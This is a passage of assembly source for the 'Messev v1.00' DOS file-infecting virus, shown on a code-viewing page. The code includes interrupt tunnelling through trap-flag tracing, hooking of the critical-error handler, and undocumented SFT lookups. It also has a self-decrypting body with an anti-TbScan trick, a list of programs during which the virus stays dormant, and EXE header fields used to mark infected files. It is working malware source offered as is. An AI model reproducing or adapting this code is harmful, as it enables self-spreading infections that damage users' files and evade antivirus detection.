📄 messev.asm
字号:
OR CL, 00011110b ; 60 secs.
CALL DosInt
Close_File: MOV AH, 3Eh ; Close file.
CALL DosInt
Exit_Int_21h:
CALL Unhook_i24h
CALL Pop_All
JMP Continue
; Tunnelled disk interrupt 13h.
BiosInt:
PUSHF
CALL DWORD PTR CS:Int13h
RETN
; === Call the tunnelled DOS-interrupt. ===
DosInt:
PUSHF
CALL DWORD PTR CS:Int21h
RETN
;====( Get interrupt vector )================================================
;
; AL = Interrupt number to hook.
;
; Return: CX:BX = Pointer to INT.
;============================================================================
GetInt:
PUSH SI
PUSH DS
PUSH AX
MOV AH, 4
MUL AH
XCHG SI, AX
XOR AX, AX
MOV DS, AX
CLI ; Get handler-address.
MOV BX, DS:[SI]
MOV CX, DS:[SI+2]
STI
POP AX
POP DS
POP SI
RETN
;====( Set interrupt vector )================================================
;
; AL = Interrupt number to hook.
;
; Returns:
;
; CX:BX = Pointer to handler.
;============================================================================
SetInt:
PUSH SI
PUSH DS
PUSH DX
PUSH AX
MOV AH, 4
MUL AH
XCHG SI, AX
XOR AX, AX
MOV DS, AX
CLI
MOV DS:[SI], BX
MOV DS:[SI+2], CX
STI
POP AX
POP DX
POP DS
POP SI
RETN
Old_Entry DW OFFSET Carrier, 0 ; Entrypoint host.
Old_Stack DW OFFSET Virus_End + 1024, 0 ; Stacksegment host.
; === Finds the original BIOS & DOS entrypoint. ===
Tracer:
CALL Push_All
MOV AH, 52h ; List of lists.
INT 21h
MOV AX, ES:[BX-02h] ; Get 1st MCB.
MOV Dos_Segment, AX
MOV AL, 01h ; Save INT 01h.
CALL GetInt
MOV Int01h, BX
MOV Int01h+2, CX
MOV AL, 01h ; Hook INT 01h.
MOV BX, OFFSET NewInt01h
MOV CX, CS
CALL SetInt
MOV AL, Trace_Mode ; Get address from vector.
CALL GetInt
PUSHF
POP AX
OR AH, 01h ; TF on.
PUSH AX
POPF
CMP Trace_Mode, Bios
JNE Mode_Dos
MOV Int13h, BX
MOV Int13h+2, CX
XOR AH, AH ; Reset disk.
CALL BiosInt
JMP Exit_Tracer
Mode_Dos:
MOV Int21h, BX
MOV Int21h+2, CX
MOV AX, 3000h ; Get DOS-version (OEM).
CALL DosInt
Exit_Tracer:
PUSHF
POP AX
AND AH, NOT 01h ; TF off (just in case).
PUSH AX
POPF
MOV AL, 01h ; Restore INT 01h.
MOV BX, Int01h
MOV CX, Int01h+2
CALL SetInt
CALL Pop_All
RETN
; I should be learning 4 my exams right now...
DB 'If I don''t pass... fuck it!', 0
DB 'SKLSUX!'
NewInt01h:
PUSH BP
MOV BP, SP
PUSH AX
PUSH DS
MOV AX, [BP+4] ; Segment.
CMP Trace_Mode, Bios
JNE Trace_Dos
CMP AH, 0C0h ; In BIOS-segment?
JB Not_In_Bios ; Continue when not.
MOV Int13h+2, AX
MOV AX, [BP+2]
MOV Int13h, AX
JMP Diss_Flag
Trace_Dos:
CMP AX, Dos_Segment ; In DOS-segment?
JNB Not_In_Bios ; Continue when not.
MOV Int21h+2, AX
MOV AX, [BP+2]
MOV Int21h, AX
Diss_Flag:
AND BYTE PTR [BP+7], NOT 01h ; Diss trapflag on stack.
Not_In_Bios:
POP DS
POP AX
POP BP
IRET
; Taken from Predator virus.
Push_All:
POP CS:[Ret_Add] ; Pop return address to var.
PUSHF
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH DS
PUSH ES
PUSH BP
JMP CS:Ret_Add ; Push return address on
; the stack.
Pop_All:
POP CS:[Ret_Add] ; Save return address.
POP BP
POP ES
POP DS
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POPF
JMP CS:[Ret_Add]
; Gets the SFT-address. *UNDOCUMENTED*
; BX = Handle.
;
Get_DCB:
PUSH BX
MOV AX, 1220h ; Get DCB-number.
INT 2Fh
MOV AX, 1216h ; Get DCB-address.
MOV BL, ES:[DI]
INT 2Fh
POP BX
RETN
TBSCAN DB 'TBSCAN.'
; During execution of one of these programs, the virus will be inactive,
; (no stealth, no infect).
No_Active:
DB 'PKZIP.E' ; PKZIP.EXE
DB 'ARJ.EXE' ; ARJ.EXE
DB 'LHA.EXE' ; LHA.EXE
DB 'RAR.EXE' ; RAR.EXE
DB 'CHKDSK.' ; CHKDSK.EXE
End_No_Active:
Hook_i24h:
CALL Push_All
MOV AL, 24h ; Get INT 24h.
CALL GetInt
MOV CS:Int24h, BX
MOV CS:Int24h+2, CX
MOV AL, 24h ; Hook INT 24h.
MOV BX, OFFSET NewInt24h
MOV CX, CS
CALL SetInt
CALL Pop_All
RETN
; I would really recommend getting this CD
; (yes, it's da theme-music from Carmageddon).
DB '[ DEMANUFACTURE - FEAR FACTORY ]'
Unhook_i24h:
CALL Push_All
MOV AL, 24h ; Restore INT 24h.
MOV BX, CS:Int24h
MOV CX, CS:Int24h+2
CALL SetInt
CALL Pop_All
RETN
; Dummy Critical Error handler.
NewInt24h:
MOV AL, 03h
IRET
;=======================================================================
; Search a table & (re)set zeroflag depending on result. ZF when found.
;
; DS:SI = Line
; CS:DI = Table
; CX = Number of names to compare.
;=======================================================================
Search_Table:
PUSH AX
PUSH BX
PUSH SI
PUSH DI
PUSH BP
PUSH DS
PUSH ES
PUSH CX
PUSH DI
PUSH ES
PUSH DS
POP ES
PUSH SI
POP DI
MOV AL, '.'
CLD
MOV CX, 127
REPNZ SCASB
MOV AL, '\'
STD
MOV CX, 127
REPNZ SCASB
MOV BP, ES:[DI+2]
MOV BX, ES:[DI+4]
MOV DX, ES:[DI+6]
MOV AL, ES:[DI+8]
POP ES
POP DI
POP CX
Find_Match:
CMP CS:[DI+0], BP
JNE Not_Found
CMP CS:[DI+2], BX
JNE Not_Found
CMP CS:[DI+4], DX
JNE Not_Found
CMP CS:[DI+6], AL
JNE Not_Found
Comple: CMP AX, AX
JMP Exit_Sea
Not_Found:
ADD DI, 7
LOOP Find_Match
XOR AX, AX
NOT AL
CMP AL, AH
Exit_Sea:
POP ES
POP DS
POP BP
POP DI
POP SI
POP BX
POP AX
RETN
; Is the handle in BX corresponding to a file or a device? (sets ZF).
Check_Handle:
MOV AX, 4400h ; IOCTL
CALL DosInt
TEST DL, 80h ; Filehandle?
RETN
Port_Driver DB 'C:\WINDOWS\SYSTEM\IOSUBSYS\HDFLOP.PDR', 0
Parameters DB ' NM CO', 0Dh
End_Encrypted_File:
NOP_Msg DB '$'
; === VIRUS ENTRYPOINT ===
START:
PUSHF ; Save registers.
PUSH AX ; (Same as Push_All).
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH DS
PUSH ES
PUSH BP
;IN AL, 21h ; Take-out keyboard.
;OR AL, 02h
;OUT 21h, AL
PUSH CS
POP DS
XOR BX, BX
MOV CX, OFFSET End_Encrypted_File
Decrypt_Byte: XOR BYTE PTR [BX], 0 ; Decrypt our body.
ORG $-1
File_Key DB 0
INC BX
MOV AH, 09h ; Prints a empty string.
MOV DX, OFFSET NOP_Msg ; (Anti-TbScan).
INT 21h
LOOP Decrypt_Byte
JMP Entry
Virus_End:
Header:
Mark DW 0 ; .EXE-identifier (always 'MZ').
Mod512 DW 0
Byte_Pages DW 0
Num_Reloc DW 0
HeaderSize DW 0
MinMem DW 0
MaxMem DW 0
Init_SS DW 0
Init_SP DW 0
Checksum DW 0 ; Checksum, unused by MS-DOS, used by us.
Init_IP DW 0
Init_CS DW 0
; === TEMP VARIABLES ===
Status DB 0
Init_Status DB 0
Int01h DW 0, 0
Int21h DW 0, 0 ; Tunnelled INT 21h.
Int24h DW 0, 0
New_Pos DW 0, 0
Old_Pos DW 0, 0
File_Pos DW 0, 0
Read_Bytes DW 0
Padding DW 0
Dos_Segment DW 0 ; 1st Memory Control Block.
Trace_Mode DB 0 ; Are we tracing BIOS or DOS-interrupt?
Ret_Add DW 0
Tunnel_Int DW 0, 0 ; Address of the tunneled interrupt.
Read_Buffer DW 0, 0
FileTime DW 0
FileDate DW 0
Temp DB 0
Buffer:
Carrier:
PUSH CS
POP DS
MOV AH, 09h ; Display warning.
MOV DX, OFFSET Warning_Msg
INT 21h
MOV AX, 4C00h ; Exit to DOS.
INT 21h
Warning_Msg DB 'WARNING: This program is infected with the '
DB 'Messev v1.00 virus!', 0Ah, 0Dh, '$'
END START
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -